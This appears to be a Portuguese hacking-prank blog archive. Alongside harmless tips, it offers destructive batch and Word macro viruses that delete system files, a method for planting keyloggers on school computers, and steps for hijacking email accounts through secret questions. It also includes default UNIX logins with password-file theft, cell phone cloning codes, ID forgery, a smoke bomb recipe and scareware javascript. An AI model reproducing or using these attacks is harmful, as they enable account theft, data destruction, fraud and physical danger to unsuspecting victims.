Hack Sacanagens

Keylogger Download

2010-05-21T19:14:00.006-03:00

Aí vai uma lista de alguns Keyloggers muito bons, se você quiser saber o que seus filhos vêem na Internet, ou descobrir a senha de alguém que entrou no seu PC, veio ao lugar certo.

REFOG Keylogger Download - DepositFiles

Revealer Keylogger Download - DepositFiles

Family Keylogger Download - DepositFiles

Personal Inspector Keylogger Download - DepositFiles

Comandos Alt + Número

2010-05-20T21:21:00.002-03:00

Aqui vai a lista dos comandos:

Alt + 1= ☺
Alt + 2= ☻
Alt + 3= ♥
Alt + 4= ♦
Alt + 5= ♣
Alt + 6= ♠
Alt + 7= •
Alt + 8= ◘
Alt + 9= ○
Alt + 10= ◙
Alt + 11= ♂
Alt + 12= ♀
Alt + 13= ♪
Alt + 14= ♫
Alt + 15= ☼
Alt + 16= ►
Alt + 17= ◄
Alt + 18= ↕
Alt + 19= ‼
Alt + 20= ¶
Alt + 21= §
Alt + 22= ▬
Alt + 23= ý
Alt + 24= ↑
Alt + 25= ↓
Alt + 26= →
Alt + 27= ←
Alt + 28= ∟
Alt + 29= ↔
Alt + 30= ▲
Alt + 31= ▼
Alt + 32=

Do Alt + 33 até o Alt + 126 são caracteres de letras e números

Alt + 127= ⌂
Alt + 128= Ç
Alt + 129= ü
Alt + 131= â
Alt + 132= ä
Alt + 133= à
Alt + 134= å
Alt + 135= ç
Alt + 136= ê
Alt + 137= ë
Alt + 138= è
Alt + 139= ï
Alt + 140= ¥
Alt + 141= ì
Alt + 142= Ä
Alt + 143= Å
Alt + 144= É
Alt + 145= æ
Alt + 146= Æ
Alt + 147= ô
Alt + 148= ö
Alt + 149= ò
Alt + 150= û
Alt + 151= ù
Alt + 152= ÿ
Alt + 153= Ö
Alt + 154= Ü
Alt + 155= ø
Alt + 156= £
Alt + 157= Ø
Alt + 158= ×
Alt + 159= ƒ
Alt + 160= á
Alt + 161= í
Alt + 162= ó
Alt + 163= ú
Alt + 164= ñ
Alt + 165= Ñ
Alt + 166= ª
Alt + 167= º
Alt + 168= ¿
Alt + 169= ®
Alt + 170= ¬
Alt + 171= ½
Alt + 172= ¼
Alt + 173= ¡
Alt + 174= «
Alt + 175= »
Alt + 176= ░
Alt + 177= ▒
Alt + 178= ▓
Alt + 179= │
Alt + 180= ┤
Alt + 181= Á
Alt + 182= Â
Alt + 183= À
Alt + 184= ©
Alt + 185= ╣
Alt + 186= ║
Alt + 187= ╗
Alt + 188= ╝
Alt + 189= ¢
Alt + 190= ¥
Alt + 191= ┐
Alt + 192= └
Alt + 193= ┴
Alt + 194= ┬
Alt + 195= ├
Alt + 196= ─
Alt + 197= ┼
Alt + 198= ã
Alt + 199= Ã
Alt + 200= ╚
Alt + 201= ╔
Alt + 202= ╩
Alt + 203= ╦
Alt + 204= ╠
Alt + 205= ═
Alt + 206= ╬
Alt + 207= ¤
Alt + 208= ð
Alt + 209= Ð
Alt + 210= Ê
Alt + 211= Ë
Alt + 212= È
Alt + 213= ı
Alt + 214= Í
Alt + 215= Î
Alt + 216= Ï
Alt + 217= ┘
Alt + 218= ┌
Alt + 219= █
Alt + 220= ▄
Alt + 221= ¦
Alt + 222= Ì
Alt + 223= ▀
Alt + 224= Ó
Alt + 225= ß
Alt + 226= Ô
Alt + 227= Ò
Alt + 228= õ
Alt + 229= Õ
Alt + 230= µ
Alt + 231= þ
Alt + 232= Þ
Alt + 233= Ú
Alt + 234= Û
Alt + 235= Ù
Alt + 236= ý
Alt + 237= Ý
Alt + 238= ¯
Alt + 239= ´
Alt + 241= ±
Alt + 242= ‗
Alt + 243= ¾
Alt + 244= ¶
Alt + 245= §
Alt + 246= ÷
Alt + 247= ¸
Alt + 248= °
Alt + 249= ¨
Alt + 250= •
Alt + 250= •
Alt + 251= ¹
Alt + 252= ³
Alt + 253= ²
Alt + 254= ■

Javascripts

2009-12-25T03:15:00.010-02:00

Javascript do Elefante

É um javascript lazarento. Principalmente quando eu configurei para 100.000 e ativei enquanto carregava uma página de download quase impossível de achar na outra guia. Se ainda não conhece esse javascript, mude o 500 para 10 e teste no seu PC

Aí vai:

Se quiser mandar para seu amigo que sempre te ferra, mude para 9999999999999999999

Javascript do PC infectado

Eu acho que o melhor jeito de mandar é escondendo em algum outro link.

Aí vai:

javascript:alert("Seu computador foi infectado pelo Trojan Horse 'Win32:Trojan-gen'. Destruição de dados da pasta 'C:' iniciará em:");document.write(" 3 ");alert("Localizando Firewall e Anti-Vírus a ser desativados...");document.write(" 2 ");alert("Sistemas de Segurança desativados com sucesso");document.write(" 1............0 ");document.write(" Iniciando Destruição de dados de 'C:'... ");confirm("O Anti-Vírus localizou uma tentativa de desativação do mesmo. Gostaria de reativá-lo?");document.write(" 20% Concluído ");confirm("O Anti-Vírus detectou a destruição de arquivos por um 'Win32:Trojan-gen'. Deseja excluir o Malware?");document.write(" 40% Concluído ");alert("Atenção! Seu Anti-Vírus foi deletado! Sistema corre perigo!");document.write(" 60% Concluído ");prompt("Digite seu E-Mail para comunicar a Central sobre o problema da invasão:");alert("E-Mail hackeado com sucesso por J.C.");document.write(" 80% Concluído ");alert("Os danos no Sistema são irreparáveis.");document.write(" 100% Concluído ");alert("Processo de Formatação Completo. Desativando o Sistema permanentemente em 10 segundos...");alert("Zueeeraaa!!! Foi só brincadeira, não aconteceu nada com seu computador nem com seu E-Mail. Quer aprender mais coisas como esta aki? Vou redirecionálo ao meu site. Até mais! By: Jack Constan");window.location="http://www.hacksacanagens.blogspot.com"

Javascript do Merda

Quase a mesma coisa do Javascript do Elefante

Aí vai:

Mesmo esquema: Se for mandar para o amigo cuzão, mude de 100 para 9999999999999999999

Texto Piscante - Feliz Natal!!!

2009-12-24T23:56:00.009-02:00

Por causa do Natal, vou postar algo que achei interessante em um desses rolês na net:

É um código em Javascript que faz o texto de uma página ficar piscando como luzes natalinas. Tá certo que o tempo vai passar e esse post vai ficar sem graça e esquecido pelos visitantes, mas é a vida.

No lugar de Merry Christmas!!!, coloque o que quiser que fique piscando

Colocando Seu Nome no Relógio do Windows

2009-12-06T22:45:00.005-02:00

Abra o Painel de Controle e clique em "Opções Regionais e de Idiomas, depois clique em Personalizar.

Vá em Hora. É só colocar o seu nome no campo "AM Symbol e PM Symbol", e depois acrecente as letras tt no campo "Formato de Hora" e clique em Aplicar. Pronto!

Vai ficar assim:

Comandos do Executar do Windows

2009-12-05T21:30:00.002-02:00

Lista com todos os comandos do executar do windows, que é um dos aplicativos mais úteis do sistema. São praticamente todos os comandos do executar. Para acessar o "EXECUTAR", aperte o logotipo do Windows + letra "R".

Lista de comandos do Executar:

Serviços de Componentes: comexp.msc

Sistema de checagem de arquivos (Limpa cache de arquivo): sfc /purgecache

Definições locais de segurança: secpol.msc

Performance Monitor: perfmon.msc

Resultant Set of Policies: rsop.msc

Serviços: services.msc

Contas de Usuário: control userpasswords2

Gestor de Usuários do Wint Server (P/ Windows Server 2003): usrmgr

Instalador do Active Directory (P/ Windows Server 2003): dcpromo

Gestor de Tarefas: taskmgr

Pastas Partilhadas: fsmgmt.msc

Politicas de Grupo: gpedit.msc

Utilizadores Locais e Grupos: lusrmgr.msc

Desfragmentador de Disco: dfrg.msc

Visualizador de Eventos: eventvwr.msc

Protegendo Banco de Dados de Contas do Windows XP: syskey

Conectar-se ao Site do Windows Update: wupdmgr

Introdução ao Windows XP: tourstart

Gestão do Computador: compmgmt.msc

Gestão de Discos: diskmgmt.msc

Sistema de checagem de arquivos : sfc /cachesize=x

Gestor de Dispositivos: devmgmt.msc

Password Properties: password.cpl

Desempenho: perfmon.msc

Desempenho: perfmon

Opções Regionais e de Idioma: intl.cpl

Contas de Usuário: nusrmgr.cpl

Controladores de Jogo: joy.cpl

Iexpress Wizard: iexpress

Serviço de Indexação: ciadv.msc

Checagem de disco: chkdsk

Gestor do Computador: compmgmt.msc

Propriedades de Data e Hora: timedate.cpl

Desfragmentador de Disco: dfrg.msc

Desligar o sistema: shutdown

Fazer Logoff: shutdown -l

Reiniciar: shutdown -r

Sistema de checagem de arquivos (Pesquisa todos os APS): sfc /scannow

Sistema de checagem de arquivos (Pesq. todos os APS/cada inicializ.): sfc /scanboot

Gestor de Utilitários: utilman

Firewall do Windows: firewall.cpl

Sistema de checagem de arquivos (Restaura pesquisa/valores padrões): sfc /revert

Lente de Aumento: magnify

Janela das Ligações de Rede: ncpa.cpl

Gerenciador de Instrumentação do Windows: wmimgmt.msc

Gestor de Disco: diskmgmt.msc

Gestor de Partição: diskpart

Propriedades de Vídeo: control desktop

Propriedades de Vídeo: desk.cpl

Propriedades de Vídeo (Já na Aba Aparência): control color

Dr. Watson: drwtsn32

Gestor de Verificação de controladores: verifier

Visualizador de Eventos: eventvwr.msc

Opções de Acessibilidade: verifier

Assistente para Adicionar Hardware: hdwwiz.cpl

Certificados: certmgr.msc

Mapa de Caracteres: charmap

Visualizador da Área de Transferência: clipbrd

Linha de Comando: cmd

Serviços de Componentes: dcomcnfg

Propriedades de Teclado: control keyboard

Configurações Locais de Segurança: secpol.msc

Gestor de Objetos - Pacote: packager

Administrador de Fonte de Dados ODBC: odbccp32.cpl

Opções de Telefone e Modem: telephon.cpl

Propriedades de Opções de Energia: powercfg.cpl

Solicitações do Operador de Armazenamento Removível: ntmsoprq.msc

Conjunto de Directivas Resultantes (P/ Windows XP Professional): rsop.msc

Scanners e Câmeras: sticpl.cpl

Criando Pasta Invisível

2009-11-18T15:52:00.001-02:00

Uma pasta invisível ´muito útil se você quiser guardar seu pornozão, ou se você quiser guardar programas e vírus seus mas não quer que um trouxa destrua seu PC com eles. Para criá-la, siga os passos abaixo:

1) Cique com o botão direito na *Área de Trabalho (mais aconselhável)* ou qualquer outra pasta e escolha Novo> Pasta.
2) Quando for renomear sua Nova Pasta, digite, pressionando alt, 0160 (alt+0160)
3) Clique com o botão direito e clique em "Propriedades". Vá em "Personalizar" e depois em "Alterar Ícone..."
4) Procure um ícone sem desenho nenhum (é um espaço maior entre os outros ícones) e clique "OK"
5) Diga "Obrigado Mestre Jack"

Se você quiser saber onde está sua pasta é só selecionar tudo que você verá um pedacinho de nada selecionado. É onde o nome da sua pasta estaria.

*Eu acho a Área de Trabalho melhor porque é um lugar mais difícil de achar, se você tiver um Plano de Fundo bem zuado, mas você que escolhe. É melhor também porque eu não tenho certeza 100% que funciona em outros lugares.

Hackeando MSN

2009-10-09T15:33:00.002-03:00

Hackeando Gente Burra (Típico Brasileiro)

1) Escolha seu alvo. Quanto mais você conhecer sobre a pessoa, mais fácil.
2) Entre no Hotmail e abra o link "esqueceu sua senha?"

3) Digite o endereço de email do alvo.

4) Escolha o link " Forneça as informações da conta e responda à sua pergunta secreta."

5) As perguntas possíveis são:

* Personagem de ficção favorito
* Personagem histórico favorito
* Livro/história infantil favorita
* Filme infantil favorito
* Comida de que você sempre gostou
* Seus dois melhores amigos de infância
* Programa de TV favorito que não passa mais
* Seu primeiro carro
* Primeira empresa em que você trabalhou

6) Abra o Orkut e procure pelo nome da pessoa.

7) Caso a pergunta da pessoa seja uma das que estão em negrito, o perfil dela no Orkut já dará a resposta.

8) Se não conseguir adivinhar, simplesmente pergunte para a pessoa. Adicione ela no MSN e comece uma dessas conversas "oi! de onde você é?" e vai aos poucos levando ela a falar sobre o assunto da pergunta. Como o assunto está muito mais ligado às experiência pessoais dela do que a uma questão de segurança, provavelmente ela dirá a resposta sem notar.

9) Se você conseguiu descobrir a resposta secreta, agora pode redefinir a senha e fazer o que bem entender com a conta.

Hoje em dia é que as perguntas não podem ser pessoais. Em tempos que seus dados estão disponíveis para qualquer um, esse sistema de perguntas ficou bastante falho.
Ex. Muitas pessoas colocam a pergunta: Seu time de futebol favorito. Basta ver as comunidades do indivíduo no Orkut pra descobrir. Ou mesmo chamar ele de Flamenguista pra ele se entregar no próprio MSN.

Bomba de Merda

2009-10-08T19:01:00.006-03:00

1º modo: Pegue merda de preferência sua ou cavalo, tanto faz. Bom é quando é merda de diarréia. Agora compre rojão pode ser até fraquinho, pra ninguém desconfiar compre em época de campeonato de futebol.
Agora tire a pólvora do rojão e coloque a merda dentro de uma sacola, misture os 2 e mexa bem mas bem mesmo, agora taque um fósforo, se quiser tempo bote um rastro de pólvora ou mais tempo ainda um cigarro!

2º modo: Aproveite época de São João e recarregue seu arsenal de bombas prontas, com isso compre uma bombinha 5 pra cima, encontre uma merda bem mole, coloque a bombinha no meio e com o pavil pra cima. Num vai idiotice e por o pavio pra baixo! Bem... agora acenda e corra!

3° modo: Para fazer na escola.

Peça para o prof. permissão para cagar, vá no banheiro e cague num saco de pão. Depois leve para a sala ou para alguma outra sala no 2° andar ou 3°, que se foda o andar.
Coloque pólvora dentro do saquinho e um pavil saindo dele.
Feche o saquinho, acenda o pavil e jogue pela janela, bem em cima do carrinho daquele lazarento que fica vendendo pipoca bem embaixo da sua sala, deixando todo mundo com fome. Com a bomba, ninguém mais vai ter fome com o cheiro.
OBS: Tente acertar dentro do carrinho, na parte onde a pipoca fica estourando, pra fuder tudo de vez.

Bomba de Fumaça

2009-10-08T18:47:00.004-03:00

Você vai precisar de:

- Nitrato de Potássio (encontrado em lojas de adubo e jardinagem em geral) 60g

- Açúcar (encontrado em todo lugar) 40g

- Bicarbonato de sódio, uma colher

- Colorífico (pessoas em comunidades recomendam usar coloral ou colorífico de alimento, já no vídeo diz que azul ou laranja são os melhores) três colheres grandes

Produção:
Coloque o nitrato junto com o açúcar em fogo baixo até que o açúcar comece a caramelizar (comunidades dizem que colocar um POUCO de água ajuda na qualidade da queima).
Vá mexendo por mais algum tempo e depois adicione 1 colher de bicarbonato de sódio (que ajuda a combustão a ser mais lenta). Depois adicione 3 colheres cheias de colorífico e mexa bastante. Tem que ficar parecendo merda mole alaranjada (pastosa).

Coloque a massa em um tubo, enfie uma caneta e espere 1 hora para que a caneta dê o molde e faça com que a combustão seja melhor. Em seguida, tire a caneta e enfie um pavio grande de bomba, coloque um pedaço pequeno de algodão para fixar e enrole o pote com fita isolante, não se esquecendo de deixar um pequeno orifício na ponta.

Se você não entendeu, eu perdôo dessa vez, pq aí vai o vídeo explicando:
OBS: O vídeo é em inglês, e se você não entender, foda-se, não mandei matar aula de idiomas. Se você fizer alguma merda na cozinha, não me responsabilizo, depois é você quem vai levar cintada na bunda. Boa Sorte.

Bomba de Fedor

2009-10-08T18:41:00.003-03:00

1) Vá numa farmácia e compre uma ampola de Metiocolin B12 (é bem barato, acho que sai por menos de 1 real)

2) Arrume um pedaço de barbante

3) Molhe o barbante no remédio

4) Deixe secar (pode ser no sol ou atrás da geladeira mesmo, se você não tiver geladeira, vá à merda)

5) Depois de seco, você terá em mãos o famoso "fedozinho". Esse barbante, quando queimado, provoca náuseas e ânsia de vômito nas pessoas.

Invadindo UNIX

2009-09-03T20:16:00.008-03:00

Entrando no sistema - Para entrar no sistema, você deve entrar com um "login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígitos. Dai você tem duas saídas:

1. Arrumar a lista de passwords com um hacker

2. Tentar entrar com os defaults.
Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde. Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo:

Login Password

root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin admin
sysadmin sys
sysadmin system
sysadmin sysadmin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
sysadmin sysadmin
games games
games player
sysop root
sysop sysop
demo demo

3. Dentro do sistema: Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords.
Ele se está em: /etc/passwd Nesse arquivo, você vai encontrar as informações na seguinte sintaxe:
username:password:UserID:GroupID:descrição ou nome:homedir:shell Ex.:ard:234abc56:7148:34:Rodrigo
Ardilha:/home/dir/ard:/bin/ard Username: ardilha Encrypted Password: 234abc56 User Number: 7148 Group Number: 34
Other Information: Rodrigo Ardilha Home Directory: /home/dir/ard Shell: /bin/ard Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. Antes de usar
o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema. Ex.: ard::7148:34:Rodrigo Ardilha:/home/dir/ard:/bin/ard Depois da lista
de passwords, pegue os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também encriptados.
sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin. /usr/mail/ - É onde estão guardadas as mensagens de cada usuário.

Invadindo Windows 95

2009-09-03T20:15:00.004-03:00

Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão.

Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado

Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.

Invadindo pela porta 666

Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa.

Invadindo pelo IP da vitíma

A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada.

Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá.

Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera la.

Lembresse q isso só dará certo se vc conectar via dial-up pelo Win95, ppp. Caso contrario não funcionara, e q também só dá certo se o compartilhamento de dados e impressão estiver ligado. É lógico q há maneiras de burlar isso, mas é perciso manjar de alguma lingugem. (vc pode fazer uma linha de comando no windows q vai até o compartilhamento e liga e passar esse programa para o cara dizendo q é outra coisa, o unico problema é q ele tem q reiniciar o CPU, mas ha modos para mudar isso também)

Invadindo Escola

2009-09-03T20:13:00.002-03:00

1º Método

Você já deve ter percebido que na sua escola existe algum tipo de rede ligando o computados central, com os computares dos alunos (bom, é assim aqui), mas essa rede só os professores "mais avançados" tem acesso, devido existir senhas para entrar. Pocê já deve te pensado como deve ter documentos importantes, provas, notas dos alunos, etc nesse computador central, já imagino se você entrar nele? todo mundo já deve te pensado nisso alguma vez, bom existe um método de se descobrir essa senha, claro, tem que ter paciência, não vai ser de um dia para o outro que você vai dá sorte de conseguir, mas você tem que usar a cabeça , vou descrever mais ou menos como você deve fazer isso, mas cuidado, pense nas conseqüências antes.

Primeiro você tem que arranjar um desse programas abaixo :
Dos: keycopy.zip
Windows 95: keytrap.zip

Esse são programas que gravam em um arquivo todas as teclas apertas desde a execução do mesmo, já deve te sacado o que fazer agora !

Depois de te pego esse arquivo você mete eles em um disquete, descompactado (claro), e leva ele para a escola no dia que você tiver aquela aula chata de química que vocês vão para a sala de informática e te que vê aquele programinha fudido "Hyper tabela periódica"(é esse o daqui), bom... por enquanto o professor tiver tirando duvidas dos Lamers você aproveita e mete ele no drive, vai no Prompt do DOS, copia os arquivos do disquete para o diretório Windows (copy a:\*.* c:\ ), de preferência, copia os arquivos do "KeyCopy.zip", para que possa fazer ele rodar quando o sistema iniciar sem ninguém perceber. Após você ter copiado o mesmo para o diretório do Windows, vá para a raiz e insira as seguintes linhas no arquivo "autoexec.bat" (use o Edit do MS-DOS):
cd\windows
(acho que é KeyCopy mesmo)

Agora salve o arquivo, saia do prompt e continue fingindo que está super interessado na matéria. Pocê tem que fazer isso no máximo em 1 minuto, para que ninguém perceba. Quando você voltar lá de novo, você pega o mesmo computador que você "crackeou", vá no diretório Windows de novo (via DOS) e copie o arquivo que o programa gravou as informações para o disquete (veja no "manual" do programa em que arquivo ele grava as teclas digitadas), depois disso na sua casa você vê com calma o arquivo e vê se tudo que foi gravado e procura alguma coisa a ver com senha, a se você chegou até aqui o resto é com vc!!!

Ver Câmeras Pelo Google

2009-08-14T22:43:00.006-03:00

Para ver cameras de empresas ou cameras que estão expostas na rua pelo Google, siga os passos abaixo:

1° Entre no site http://www.google.com/.

2° Na barra de pesquisa você coloca uns desse codigos Abaixo.

inurl:"ViewerFrame?Mode=”

inurl:"MUltiCameraFrame:?Mode=”

inurl:"view/index.shtml”

Ai vai aparecer varios link em cada link da pesquisa e um lugar diferente e uma camera diferente.

Faça Seu Vírus

2009-08-12T22:21:00.005-03:00

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker, ou o do seu trabalho, etc.)

Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.

Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat

Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04

Sub MAIN

If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then

DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”

Close #1

End if

Open “c:\autoexec.bat” For Output As #1

Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”

Close #1

End Sub

ROTINA 2

Sub MAIN

Open “C:\imaiden.txt” for Output As #1”

Print #1 “Código em hexadecimal”

Print #1 “Código em hexadecimal” ‘(continuação)...

Close #1

Shell “debug texto.txt”

Shell “c:\imaiden.com”

End Sub

ROTINA 3
Sub MAIN

MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0

End sub

Vírus Fagundes Varela
Sub MAIN

InícioDocumento

Inserir “Lembra dessas noites”

Inserir CHR$(13)

Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)

Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)

Inserir “Do vento aos brandos açoites?”

Inserir CHR$(13)

Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)

Inserir “Quando as campinas tremiam”

Inserir CHR$(13)

Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)

Inserir “E nossas almas unidas”

Inserir CHR$(13)

Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)

Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão

End Sub

As Ameaças dos Hackers

2009-08-12T22:18:00.006-03:00

O simples fato de estar conectado à Internet implica em uma série depossibilidades de atentado à sua segurança.

Entre as principais ameaças estão:

Redes Corporativas: Disponibilizar serviços Internet em uma rede corporativa pode abrir diversos furos de segurança, permitindo que recursos ou informações da empresa sejam acessados de forma indevida por estranhos.

Servidores: A ameaça de alteração nas informações de servidores pode ser mortalmente prejudicial para uma empresa. Por exemplo, a modificação da especificação de algum produto em um servidor da web pode fazer com que inúmeros negócios sejam perdidos.

Transmissão: Às vezes pode não ser necessário uma invasão de servidores ou redes. É possível violar a transmissão da informação pela Internet,interceptando-se mensagens, arquivos, senhas etc.

Interrupção: Um serviço pode ser atacado de uma maneira menos sutil, mas nem por isso menos perigosa. Pode-se, simplesmente, fazer com que o serviço "caia", deixe de funcionar, e que todos os seus usuários legítimos fiquem inacessíveis.

Negação: Em transações pela Internet, ainda temos um outro problema a solucionar. Negar a participação em uma negociação digital também pode ser.

Pegando IP pelo chat

2009-08-12T22:15:00.005-03:00

Entre em um chat (Bate Papo) e escolha uma vítima...de exemplo vou chamar a vítima de marcos.

Selecione a opção: "só receber mensagens de"; e fique falando com o marcos...

Abra o prompt do DOS e digite arp -a (quando fizer isso eh melhor que esteja com icq e outros programas de rede fechados...feche outros sites tbm..) agora tecle enter...aparecerá vários ips...

Normalmente o segundo é o da vitima...para ver se não está pegando seu proprio ip abra o iniciar va em executar e depois escreva winipcfg...confira se todos os ips do winipcfg naum estão na lista se estiverem não pegue nenhum desses...Agora que vc tem o ip do cara nuke ele ou invada se vc quiser.

Clonando Celular Nokia

2009-08-12T21:48:00.005-03:00

ANTES DE MAIS NADA QUERO DIZER A PALAVRA "CLONAGEM" ESTA EXPRESSA DE UM MODO COMPARATIVO COM RELAÇÃO A CLONAGEM VERDADEIRA. OU SEJA, O QUE VAMOS FAZER É SIMPLESMENTE REPROGRAMAR NOSSO CELULAR PARA QUE ATUE COMO OUTRO.

CLONAGEM:

ANTES DE CLONAR NOSSO TELEFONE TEMOS QUE TER 3 COISAS FUNDAMENTAIS PARA O BOM FUNCIONAMENTO:

CÓDIGO DE ÁREA

MIN (NÚMERO INTERNO DO APARELHO MÓVEL)

CÓDIGO DE ÁREA: ESTE CÓDIGO É DESIGNADO PARA CADA CIDADE DE CADA PAÍS.

SYSTEM ID: IDENTIFICAÇÃO DO SISTEMA, ESTE É UM NÚMERO DE 5 DIGITOS,

POR EXEMPLO: 52693

MIN---ESTE NÚMERO É SIMPLESMENTE O NÚMERO DO CELULAR.

CLONANDO CELULARES NOKIA

MODELOS - 21XX, 51XX, 61XX, 636, 639, 918.

1) PRESSIONE *#639#

2) PRESSIONE O NÚMERO DO CELULAR DE 10 DÍGITOS, PRESSIONE OK

3) TECLE O sys id, PRESSIONE OK

4) O TELEFONE SERÁ RELIGADO

MODELOS - P1000, 100, PT101, PT128, PT228, PT232.

1) LIGUE O TELEFONE

2) PRESSIONE *3001#12345

3) A TELA MARCA 00

4) MANTENHA PRESSIONADO CLR UNS SEGUNDOS

5) TECLE O NÚMERO DE CELULAR DE 10 DÍGITOS

6) PRESSIONE store, 02, CLR (POR ALGUNS SEGUNDOS)

7) PONHA O sys id

8) PRESSIONE *1*10333*05*05, PRESSIONE store

9) PRESSIONE 03, PRESSIONE store

10) PRESSIONE CLR

11) DESLIGUE O TELEFONE PARA TERMINAR A PROGRAMAÇÃO.

MODELOS - 232, 239, 515.

1) PONHA *3001#12345, PRESSIONE STO 00

2) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 beeps)

3) PONHA 911#5551212#0 * 12345, STO, 01, STO

4) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 bepps)

5) PONHA O CÓDIGO DA ÁREA E O NÚMERO DO TELEFONE, PRESSIONE STP, 01, STO

6) PRESSIONE E MANTENHA PRESSIONADO CLR (2 beeps)

7) PRESSIONE *1*1 *333*15*05# 0111 * 1 ,STO, 01, STO

8) PRESSIONE E MATENHA PRESSIONADO CLR (2 beeps)

9) DESLIGUE E LIGUE O APARELHO.

Falsificando Carteira de Identidade (RG) no Paint

2009-08-10T22:05:00.011-03:00

Isso é bem útil pra todo menor de idade. É sempre bom ter uma carteira falsificada no bolso, seja pra entrar num show, comprar bebida, qualquer coisa.

Obs.: Essa carteira não é daquelas p/b pra fingir que é xerox. Fica parecendo a original, e é muito bem feita!

Você vai precisar de:

- Paint

- Word

- Scanner

- Impressora colorida

- Tesoura

- ID original (hehehe)
